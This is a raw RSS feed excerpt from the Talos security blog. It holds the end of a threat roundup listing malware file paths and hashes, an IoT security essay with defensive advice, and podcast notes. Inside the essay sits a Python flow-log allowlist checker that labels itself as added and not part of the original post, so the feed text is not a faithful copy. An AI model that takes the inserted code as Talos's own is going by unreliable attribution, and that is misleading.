/&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-szw1jtJ8-4Q/WTrb1zASzyI/AAAAAAAABEw/Rwz1mS4kmfI_NigHnESb632kARFlwKSIQCLcB/s1600/Win_Trojan_Siggen_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="418" data-original-width="1600" height="83" src="https://1.bp.blogspot.com/-szw1jtJ8-4Q/WTrb1zASzyI/AAAAAAAABEw/Rwz1mS4kmfI_NigHnESb632kARFlwKSIQCLcB/s320/Win_Trojan_Siggen_tg.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Image.Dropper.PhishingLure&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;br /&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br 
/&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;%SystemDrive%\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.MSO\E6B7EA3D.emf&lt;/li&gt;&lt;li&gt;%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\654500.cvr&lt;/li&gt;&lt;li&gt;%TEMP%\CVRFECE.tmp.cvr&lt;/li&gt;&lt;li&gt;\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\31ADA98B.emf&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;71c534db25e2c523ed71b7ec30289f8c91a15d8f61a7c132a8f0958086d9cf67&lt;/li&gt;&lt;li&gt;b59051ead1c391fc3f5d4df44408606a6a0662456edf3a360760bc1df28e85b0&lt;/li&gt;&lt;li&gt;46e918a71e35421fd6384e4faa044758f636709aad1cdc28def585902560e75c&lt;/li&gt;&lt;li&gt;3fd12be1754315caaa508cb1dd3ed3c42d5ccfb9281a3c299b914da993919372&lt;/li&gt;&lt;li&gt;7d89276ddbb3e7d0a0c7628fbab04aace04e52f885b7b0619191b47eef4b3427&lt;/li&gt;&lt;li&gt;2190bab38a01b157023f4000b22958db934eb89fe2868593bcb3a28daca13cdb&lt;/li&gt;&lt;li&gt;884bdf459f5b218c56070cfba568a166e0f58df5e91373853b73a1eaf5c96896&lt;/li&gt;&lt;li&gt;55cae108a1f375d112831c24df0f9d0300028fb46e1ab4b7ff9c477da29888cf&lt;/li&gt;&lt;li&gt;069ea4075dfd279be50ee1a2904b6a5f024f7e924c91f5249e2047f93c971255&lt;/li&gt;&lt;li&gt;c47359bd7ab8c463522a7e3356ed6de278cfa8ebe0afe9d5e8fcb359c356eb9f&lt;/li&gt;&lt;li&gt;8752350c7df238d3bc210f13edc74486c4c5e62ee935cc32fce6d84ba2fe3664&lt;/li&gt;&lt;li&gt;c74a3428c963a4b8ecc86279e609b7e687d635068a7c607686c3b1228715affe&lt;/li&gt;&lt;li&gt;264bd038374d6dec2419788a189bc22253e944ae78e69082370700cfe163a5f6&lt;/li&gt;&lt;li&gt;c9c4a76991fa7dabe4c5e242eceefb2276470ab16933576b8834a72db99bdb8a&lt;/li&gt;&lt;li&gt;ba1e7358f4ac42e0e6d575e0f39c7a07939e31b03f82382486200b3d877fbe95&lt;/li&gt;&lt;li&gt;2aaeb1e014c6940fb9f1ed979622daec2bcb0afd27a431b60d575429513c4747&lt;/li&gt;&lt;li&gt;8fba7699a4f56f2ff0ef88137e7d9a045a8d58aeb2ee7764c70a57fd5e75c7b2&
lt;/li&gt;&lt;li&gt;6c2e949f0e7ef6beb164e164636abfdb052386cc29318b4f80193ca1bb847e36&lt;/li&gt;&lt;li&gt;0fecda1f3e3c6bfc840119d3ec7788108b3bd2555cec500f9737499b57b20361&lt;/li&gt;&lt;li&gt;e7b20cb956fb4bfbfbaaeae08265a3986114dd84fec72e6dbbda5ff8f0f9d602&lt;/li&gt;&lt;li&gt;63933469402c62a974f9e8c4d3563a1b8343cb5ae4962bbf8185cbcdf22f9855&lt;/li&gt;&lt;li&gt;5d146dc96acac7a6026b0a82d611c18c58852c328ea55d27737b2fbb0265fc3d&lt;/li&gt;&lt;li&gt;54071e124b61d87336c49408a420b98046828cceba18868e2fde9170a287843a&lt;/li&gt;&lt;li&gt;e28775913fc2f714c665bc96babe101f509399754503dcfac1cff6614f0b5e04&lt;/li&gt;&lt;li&gt;2e76194f7889f84004a11d69af8df7a08c8602555a6f8629f146a593eb4bb732&lt;/li&gt;&lt;li&gt;d15b79df9e9a6b9d09b984b1992f8433db9734e8fbe1036aecd05c941dfc6b12&lt;/li&gt;&lt;li&gt;0dc28f0d53d35417a7527ec8f248487ec270992bbfd0e1837a56fcda6fe9af1a&lt;/li&gt;&lt;li&gt;fc66061242ba1d9cf3255437b6c8d0d8a0e6fdba3e63d9a611205b8654f11246&lt;/li&gt;&lt;li&gt;05264cd26e8d9c16ff1f5a71ee5641be5113ee247270072ac1e0173ee5688849&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-RE98hgPe9Hw/WOf00kgNpzI/AAAAAAAAAy8/v2n5vvA9kGgNBMZsy9b3eJQCwsCW2hA5QCLcB/s400/amp-threatgrid-only.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://3.bp.blogspot.com/-RE98hgPe9Hw/WOf00kgNpzI/AAAAAAAAAy8/v2n5vvA9kGgNBMZsy9b3eJQCwsCW2hA5QCLcB/s400/amp-threatgrid-only.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;Screenshot&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-KFNYx9tXAGw/WTrbkTtId_I/AAAAAAAABEo/JqHlpkBBuv8_63GMd1bzfej4GDfVLw-mACLcB/s1600/Image_Dropper_PhishingLure_malware4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" 
data-original-height="768" data-original-width="1024" height="300" src="https://1.bp.blogspot.com/-KFNYx9tXAGw/WTrbkTtId_I/AAAAAAAABEo/JqHlpkBBuv8_63GMd1bzfej4GDfVLw-mACLcB/s400/Image_Dropper_PhishingLure_malware4.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/feedburner/Talos?a=PiuJF_Sg6Qw:JgJfwLtx5AI:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/PiuJF_Sg6Qw" height="1" width="1" alt=""/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-06-09T14:41:56.564-04:00</atom:updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://2.bp.blogspot.com/-f2fIc_wdSiA/WTrPRvTFc-I/AAAAAAAABC4/iKtoO4gmZwoxMzb698dCf9DljSxk-U60gCLcB/s72-c/no-umbrella.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/06/threat-roundup-0602-0609.html</feedburner:origLink></item><item><title>The Internet of Vulnerable Things</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/dmOk9Z9E5Bo/the-internet-of-vulnerable-things.html</link><category>Internet of Things</category><category>IoT</category><category>vulnerabilities</category><category>Vulnerability</category><author>noreply@blogger.com (Martin Lee)</author><pubDate>Tue, 06 Jun 2017 10:00:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-6263027603040693062</guid><description>&lt;h2&gt;Introduction&lt;/h2&gt;&lt;br /&gt;Technological progress is resulting in computing systems that are smaller, cheaper and consuming less power. These micro-computing systems are able to be integrated into everyday objects; when coupled with ubiquitous wireless connectivity these devices form the “Internet of Things”. The IoT has the potential to improve our lives, but only if we correctly manage the security risks which are inherent to these devices. &lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.gartner.com/newsroom/id/3165317"&gt;Gartner tells us&lt;/a&gt; that 6.4 billion internet connected devices were in use worldwide in 2016, and that figure will reach 20.8 billion by 2020.  
That equates to nearly 10 million new devices being connected every single day for the next four years, massively expanding the potential attack surface of unsecured devices. As businesses deploy these systems to make decisions about operational improvement, or build their business strategies around the IoT, we must consider the vulnerability of the devices and the veracity of the data they generate.&lt;br /&gt;&lt;br /&gt;IoT security interests Cisco and Talos greatly. As part of our goal to force the bad guys to innovate, we seek out and work with vendors to fix vulnerabilities before they can be abused. For example, we identified &lt;a href="http://blog.talosintelligence.com/2016/02/trane-iot.html"&gt;hard-coded credentials&lt;/a&gt; within Trane thermostats. A threat actor who discovered them could have logged into the thermostats remotely, gained complete control of the devices, and from there conducted reconnaissance of the local network to launch further attacks. We developed protection for our customers, and held off disclosing the vulnerability until the vendor released a patch to resolve the issue.&lt;br /&gt;&lt;br /&gt;An insecure IoT device connected to a corporate network is just another computer that can offer a point of ingress for attackers. Once compromised, an IoT device can be used to gather information from the network or launch attacks against other systems. However, unlike most networked computers, the IoT device is unlikely to have anti-virus or other security software installed on it. This means that an attacker can lurk there for extended periods with little risk of discovery.&lt;br /&gt;&lt;br /&gt;Criminals are aware of the opportunities posed by the IoT. 
They have “recruited” poorly secured IoT devices to form the &lt;a href="https://umbrella.cisco.com/blog/blog/2017/01/05/future-assaulting-internet-mirai/"&gt;Mirai botnet&lt;/a&gt;, which launched the largest distributed denial of service (DDoS) attack seen to date, using the stolen computing power and Internet connectivity of insecure devices to disrupt services offered by Twitter, PayPal, Spotify and other sites off and on over an entire day. Criminals have also compromised vulnerable digital video recorders used in closed-circuit television (CCTV) systems, not to wipe incriminating surveillance footage but to install malware that steals processing capacity and uses it to &lt;a href="https://arstechnica.com/security/2014/05/infecting-dvrs-with-bitcoin-mining-malware-even-easier-you-suspected/"&gt;mine bitcoins&lt;/a&gt; for profit.&lt;br /&gt;&lt;br /&gt;Not only may the devices themselves be vulnerable, but the systems that consume data collected from IoT devices can be leveraged to conduct some interesting attacks. For example, a team of Israeli researchers discovered that they could fool traffic information systems into believing that there was a traffic jam by &lt;a href="http://www.wired.co.uk/article/waze-hacked-fake-traffic-jam"&gt;spoofing traffic&lt;/a&gt; data from bogus IoT devices.&lt;br /&gt;&lt;br /&gt;Insecure IoT devices that interact with the physical world can be compromised to alter their function. For example, electronic hotel locks allow visitors to use keycards to access their rooms. However, the communications port on these devices can be abused to take advantage of inadequate security features in the lock, allowing anyone with the &lt;a href="https://www.engadget.com/2012/07/24/hacker-finds-flaw-in-hotel-locks/"&gt;necessary knowledge&lt;/a&gt; to open the door without a key.&lt;br /&gt;&lt;br /&gt;Even unlikely items such as toys and homeware can be IoT devices, and have been found to contain network vulnerabilities. 
Hackers can &lt;a href="http://www.pcworld.com/article/3012220/security/internet-connected-hello-barbie-doll-can-be-hacked.html"&gt;compromise&lt;/a&gt; a connected Barbie to spy on you, and &lt;a href="http://www.inc.com/joseph-steinberg/baby-monitors-are-vulnerable-to-hackers-here-s-how-to-secure-yours.html"&gt;subvert&lt;/a&gt; baby monitors to monitor you and your children. You can even be “watched” through your &lt;a href="https://www.forbes.com/sites/thomasbrewster/2017/03/07/cia-wikileaks-samsung-smart-tv-hack-security/"&gt;Smart TV&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;Pressures Lead to IoT Security Issues&lt;/h2&gt;&lt;br /&gt;As the world builds the infrastructure and deploys the devices that comprise the IoT, we as a society have the opportunity to apply the decades of good practice learnt during the development of the Internet – including painful lessons about the importance of security.&lt;br /&gt;&lt;br /&gt;The premise of the IoT is built upon the idea of deploying many cheap, Internet-connected devices in many places. As the market develops, manufacturers are hurrying to bring devices to market at the lowest price possible, and few buyers are insisting upon security requirements as part of their procurement processes. This means that many IoT products are sold containing known vulnerabilities, with little or no thought given to how updates can be applied to devices in order to remediate security issues.&lt;br /&gt;&lt;br /&gt;Considering security issues early in the design phase means that protection can be built into a system. Every component of an IoT system – from the device itself, to the wireless communications, to the user interface, to the management interface – is associated with weaknesses that are well known and characterized. Similarly, defenses against these types of weaknesses are also well known. 
Specifying that security is a requirement for a system, and pinpointing the types of protection that are needed, leads to a system that is more resilient and less likely to be compromised, less likely to suffer major losses when a compromise occurs, and easier to update to remediate issues when they are discovered.&lt;br /&gt;&lt;br /&gt;Not addressing security issues comes at a heavy cost. Installing insecure electronic locks means that the locks might as well not be there: they can be hacked to open for anyone. Deploying insecure devices that connect to a corporate network is like leaving an office door unlocked overnight, allowing anyone to creep in and take what they wish. Vulnerable IoT products may even be banned outright, as happened to the &lt;a href="http://www.reuters.com/article/us-germany-cyber-dolls-idUSKBN15W20Q"&gt;Internet-connected&lt;/a&gt; doll Cayla in Germany.&lt;br /&gt;&lt;br /&gt;Security issues present themselves in many forms. Resolving any single issue first requires awareness of the problem, an understanding of how the issue came about, and a grasp of how it can be remediated or mitigated. Only then can we put the correct security strategy in place.&lt;br /&gt;&lt;br /&gt;Software vulnerabilities are one such security issue affecting the IoT. Talos has a dedicated team hunting for software vulnerabilities in IoT and other systems. When we find a new vulnerability, we follow our published &lt;a href="http://blog.talosintelligence.com/2016/11/talos-responsible-disclosure-policy.html"&gt;Responsible Disclosure Policy&lt;/a&gt; to ensure that our customers are protected and that the problem gets fixed. 
By sharing these findings, we can inform and protect the community at-large and contribute to the discussion on securing the IoT.&lt;br /&gt;&lt;br /&gt;&lt;h2&gt; “Tricking” The IoT &lt;/h2&gt;&lt;br /&gt;Anyone who has been involved in writing code, or ensuring that an IT project is completed as required, on time, and on budget, will agree that writing software is hard. Creating software-based systems that meet requirements is difficult enough. To be secure, the system must not only do what it is supposed to do, but never do anything else.&lt;br /&gt;&lt;br /&gt;Vulnerabilities are simply weaknesses in a system that can be used to “trick” a system into doing something that it wasn’t supposed to do. Often, vulnerabilities lurk undiscovered because we need a specific set of circumstances to find them, i.e. we won’t encounter them unless we specifically probe for them. Once an adversary discovers them, they gain access to resources and data, or even the ability to run code in ways that the system designers never imagined or wanted.&lt;br /&gt;&lt;br /&gt;Any system containing software will almost certainly include vulnerabilities. In this respect, the IoT is no different from any other computer device. Continuously considering security as part of the requirements, system design and development will help identify potential mistakes early so that they can be rectified. The further down the development process that a security issue is identified, the more expensive it is to fix.&lt;br /&gt;&lt;br /&gt;Despite best efforts, it is almost certain that a final system will contain vulnerabilities. Encouraging the responsible disclosure of vulnerabilities combined with a rapid “fix” process helps minimize risk and exposure to harm. 
It also means that the software engineering community can learn from the mistakes of others and not make the same mistakes twice.&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;IoT Risks In Real Life&lt;/h2&gt;&lt;br /&gt;One of the key issues that Talos sees time and again is hard-coded usernames and passwords within systems. Once discovered, an attacker can use these credentials to gain access to every device in the world that shares them. Just last year we disclosed this exact issue within &lt;a href="http://blog.talosintelligence.com/2016/02/trane-iot.html"&gt;Trane thermostats&lt;/a&gt;. We worked with Trane to ensure that the problem was fixed.&lt;br /&gt;&lt;br /&gt;IoT systems require management interfaces to control the operation of the devices and to process collected data, and these interfaces are attack surface too. We recently discovered a way that attackers could take control of an IoT installation controlled by &lt;a href="http://blog.talosintelligence.com/2017/03/vulnerability-spotlight-code-execution.html"&gt;LabVIEW&lt;/a&gt;, and also found how attackers could exploit an &lt;a href="http://blog.talosintelligence.com/2017/01/Aerospike.html"&gt;Aerospike&lt;/a&gt; database to take control of the platform.&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;What Needs to Change&lt;/h2&gt;&lt;br /&gt;Nothing will change unless people are aware of the issue. Being open about vulnerabilities when they are encountered helps users consider their own security requirements and assess additional security features that they may wish to deploy. It helps them prioritize their patching regimen or, even better, simply informs them why an automated system update has been applied. Keeping quiet about security issues benefits nobody except attackers who wish to use the vulnerability to attack systems.&lt;br /&gt;&lt;br /&gt;Vendors must ensure that the software they develop is designed, developed and tested to be as secure as possible. 
Despite best efforts, hackers will discover vulnerabilities and systems will need to be patched. Making the patching process as quick and easy as possible (preferably automated) lets security updates reach devices alongside new features and functionality. For businesses and consumers to truly embrace the convenience and power of the IoT, they must feel fully confident that we’re building the IoT with security foremost in mind.&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;Protecting Your Systems&lt;/h2&gt;&lt;br /&gt;The upshot: make security part of the procurement process. Ask vendors how they discover and resolve vulnerabilities. If their answers don’t meet your expectations, don’t make the purchase.&lt;br /&gt;&lt;br /&gt;Segment networks that contain IoT devices. There is no need to have a potentially vulnerable connected thermostat on the same network as your customer database. Separate networks so that, if a device does become compromised, the potential for damage is limited.&lt;br /&gt;&lt;br /&gt;Protect IoT devices with appropriate network security measures. IoT devices are computers and require the same security measures as any other networked machine. Protect them with firewalls to block unpermitted network connections, and use IDS/IPS systems to block and alert on the presence of unauthorized network traffic.&lt;br /&gt;&lt;br /&gt;Plan how you will keep systems fully patched, how you will learn about required patches, and what you will do if a vendor is unwilling or unable to release a patch.&lt;br /&gt;&lt;br /&gt;Don’t overlook management systems. Databases and dashboards carry many security risks, notably around authenticating users and assuring the integrity of data collection. Verify that a single compromised device can’t result in the leakage or deletion of your entire database. 
Similarly, ensure that a graphical front end isn’t vulnerable to Cross-Site Scripting (XSS) attacks that could lead to an attacker gaining access to sensitive systems.&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;Conclusion&lt;/h2&gt;&lt;br /&gt;IoT systems have the capability to make great changes to our professional and personal lives. The IoT can reduce waste, improve efficiency, and create new markets through new opportunities and newly gathered data.&lt;br /&gt;&lt;br /&gt;In other words, the IoT will enable our societies to grow, progress and improve. But we must feel confident in the security of these devices to fully realize their benefits. We know how IoT systems can be attacked and subverted. We know the consequences of such attacks, and we know how these attacks can be defended and mitigated against.&lt;br /&gt;&lt;br /&gt;Society can protect IoT systems from harm, but only if that protection is insisted upon by those who are deploying, purchasing and delivering the systems. Buyers must demand better security, and manufacturers must understand the gravity of the situation. No longer can they simply strive to be first to market; they must also strive to be the safest to market. If we all start demanding better security, manufacturers will make safety a priority.&lt;br /&gt;&lt;div class="feedflare"&gt;
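To make the segmentation and firewall advice in Protecting Your Systems concrete, here is an added Python example that is not part of the original post and not Cisco or Talos code: it expresses an IoT segment as a default-deny allowlist and checks a flow export against it, so the rules can be tested against real traffic before they are enforced on a firewall or fed to an IDS. The segment ranges, the collector, resolver and vendor update addresses, the port numbers and the flow lines are all constructed assumptions for illustration.

```python
"""Check IoT-segment flow records against a default-deny allowlist.

Added example (not from the Talos post): it shows how the "segment IoT devices
and block unpermitted connections" advice can be written down as data and
tested against exported flow logs before the same rules go onto a firewall.
All addresses, segments and log lines below are constructed for illustration.
"""
from ipaddress import ip_address, ip_network

# Assumed topology: three internal segments; anything else is "external".
SEGMENTS = {
    "iot": ip_network("10.30.0.0/24"),    # thermostats, cameras, sensors
    "corp": ip_network("10.10.0.0/16"),   # workstations and the customer database
    "mgmt": ip_network("10.50.0.0/24"),   # IoT collector, dashboard, resolver
}

# Allowlist for flows that originate in the IoT segment:
# (destination network, protocol, destination port). A flow from the IoT
# segment that matches no entry is a violation; other segments are not
# constrained by this policy.
IOT_ALLOW = [
    (ip_network("10.50.0.10/32"), "tcp", 8883),    # telemetry to the collector (MQTT over TLS)
    (ip_network("10.50.0.53/32"), "udp", 53),      # the internal resolver only
    (ip_network("203.0.113.0/24"), "tcp", 443),    # the vendor's update service (TEST-NET-3)
]

# Constructed flow export, one record per line: "timestamp src dst proto dport".
FLOW_LOG = """\
2017-06-06T10:00:01Z 10.30.0.21 10.50.0.10 tcp 8883
2017-06-06T10:00:04Z 10.30.0.21 203.0.113.7 tcp 443
2017-06-06T10:00:09Z 10.30.0.21 10.10.4.15 tcp 1433
2017-06-06T10:00:12Z 10.30.0.37 10.10.0.5 tcp 445
2017-06-06T10:00:15Z 10.30.0.37 198.51.100.9 tcp 6667
2017-06-06T10:00:20Z 10.10.0.5 10.30.0.37 tcp 80
2017-06-06T10:00:25Z 10.30.0.37 8.8.8.8 udp 53
"""


def segment_of(addr):
    """Name the segment an address belongs to, or 'external'."""
    ip = ip_address(addr)
    for name, net in SEGMENTS.items():
        if ip in net:
            return name
    return "external"


def parse_flows(text):
    """Turn the space-separated export into (ts, src, dst, proto, dport) tuples."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, proto, dport = line.split()
        flows.append((ts, src, dst, proto.lower(), int(dport)))
    return flows


def is_allowed(src, dst, proto, dport):
    """Default-deny for the IoT segment; flows from other segments pass this policy."""
    if segment_of(src) != "iot":
        return True
    d = ip_address(dst)
    return any(d in net and proto == p and dport == port
               for net, p, port in IOT_ALLOW)


def violations(flows):
    """Return (flow, reason) for every flow the IoT policy would block."""
    found = []
    for flow in flows:
        ts, src, dst, proto, dport = flow
        if not is_allowed(src, dst, proto, dport):
            reason = f"iot to {segment_of(dst)} {dst}:{dport}/{proto}"
            found.append((flow, reason))
    return found


if __name__ == "__main__":
    for flow, reason in violations(parse_flows(FLOW_LOG)):
        print(flow[0], reason)
```

Run it directly to print the flows the policy would block. The thermostat talking to the customer database subnet, the camera probing SMB on a workstation, the camera reaching an unknown external host and the device resolving names against an external resolver all surface as violations, while the telemetry and vendor update flows pass. Flows that originate outside the IoT segment are deliberately left to other policies, since the point of segmentation is to constrain what a compromised device can reach, not to decide who may manage it.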
&lt;a href="http://feeds.feedburner.com/~ff/feedburner/Talos?a=dmOk9Z9E5Bo:jpni69fjZqw:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/dmOk9Z9E5Bo" height="1" width="1" alt=""/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-06-06T15:16:06.028-04:00</atom:updated><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/06/the-internet-of-vulnerable-things.html</feedburner:origLink></item><item><title>BWT EP5 - It Has Been 0-days Since This Term was Abused</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/A9hZU268Umk/bwt-ep5-it-has-been-0-days-since-this.html</link><author>noreply@blogger.com (Mitch Neff)</author><pubDate>Tue, 30 May 2017 11:42:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-4626956592715610132</guid><description>Beers with Talos Episode 5 "It Has Been 0-days Since This Term was Abused" is now available&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;Listen here:&lt;/h4&gt;Listen via&amp;nbsp;&lt;a href="https://itunes.apple.com/us/podcast/beers-with-talos-podcast/id1236329410" target="_blank"&gt;iTunes&lt;/a&gt;&lt;br /&gt;Listen directly on the &lt;a href="https://www.talosintelligence.com/podcasts"&gt;Talos Podcasts&lt;/a&gt; page.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-AjIP5TEdALw/WS23Q2uQuOI/AAAAAAAAAG0/LgXnyHSrXOwmGosuMzK2ZUQKTcyheFa5gCLcB/s1600/Twitter_organictimeline2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="512" data-original-width="1024" src="https://3.bp.blogspot.com/-AjIP5TEdALw/WS23Q2uQuOI/AAAAAAAAAG0/LgXnyHSrXOwmGosuMzK2ZUQKTcyheFa5gCLcB/s1600/Twitter_organictimeline2.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;h3&gt;Episode Notes:&lt;/h3&gt;&lt;div&gt;The crew talks about the 
potential of Samba echoing WannaCry and blocking SMB ports (but you already did that, RIGHT?).  We discuss some history lessons and give proper usage guidance on words like 0-days, backdoors, and other terms that the industry loves to hype and abuse for extra clicks.&lt;/div&gt;&lt;div&gt;What we learn in the Roundtable this week: Joel struggles to resolve the conflicts inherent in his design choices, Nigel’s daughter steals high-end electronics, Matt gaslights first responders in a major American city, Craig learns the JRE sandbox is a silver bullet, and Mitch issues a passive aggressive non-apology for just trying to make you happy.&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;h4&gt;Feedback question: &lt;/h4&gt;&lt;/div&gt;&lt;div&gt;What is stuck in Joel’s head? Tweet us &lt;a href="https://twitter.com/TalosSecurity"&gt;@TalosSecurity&lt;/a&gt;, use #BWT (also, what does #BWT mean?)&lt;/div&gt;&lt;div&gt;&lt;h3&gt;Topic table:&lt;/h3&gt;11:45 - Samba and why linux worms are hard. Really hard. 
And seriously, block 445.&amp;nbsp;&lt;/div&gt;&lt;div&gt;22:56 - When being a victim of a cyberattack is kiiinda your fault&lt;/div&gt;&lt;div&gt;25:45 - Sometimes patching is impossible&lt;/div&gt;&lt;div&gt;27:20 - Words mean things - Backdoors, 0-Days, and such&lt;/div&gt;&lt;div&gt;38:55 - Checkboxes will not save your butt when you must adjust fire.&lt;/div&gt;&lt;h4&gt;Referenced Links:&lt;/h4&gt;&lt;div&gt;Talos WannaCry Post - &lt;a href="http://blog.talosintelligence.com/2017/05/wannacry.html"&gt;http://blog.talosintelligence.com/2017/05/wannacry.html&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;Talos Samba Post - &lt;a href="http://blog.talosintelligence.com/2017/05/samba-vuln-details.html"&gt;http://blog.talosintelligence.com/2017/05/samba-vuln-details.html&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;Talos SSH Post - &lt;a href="http://blog.talosintelligence.com/2015/04/threat-spotlight-sshpsychos.html"&gt;http://blog.talosintelligence.com/2015/04/threat-spotlight-sshpsychos.html&lt;/a&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;Federal News Radio - &lt;a href="https://federalnewsradio.com/technology/2016/10/hackers-not-yet-pulling-big-guns-data-breaches-nsa-official-warns/"&gt;https://federalnewsradio.com/technology/2016/10/hackers-not-yet-pulling-big-guns-data-breaches-nsa-official-warns/&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;==========&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;Featuring&amp;nbsp;&lt;/h4&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="https://twitter.com/security_craig"&gt;Craig Williams&lt;/a&gt;, &lt;a href="https://twitter.com/joelesler"&gt;Joel Esler&lt;/a&gt;, &lt;a href="https://twitter.com/kpyke"&gt;Matt Olney&lt;/a&gt;, and &lt;a href="https://twitter.com/englishlfc"&gt;Nigel Houghton&lt;/a&gt;.&lt;/div&gt;&lt;h4&gt;Hosted by&amp;nbsp;&lt;/h4&gt;&lt;div&gt;&lt;a href="https://twitter.com/mitchneff"&gt;Mitch Neff&lt;/a&gt;.&lt;/div&gt;&lt;h4&gt;&lt;/h4&gt;&lt;h4&gt;Find all episodes&lt;/h4&gt;&lt;div&gt;&lt;a 
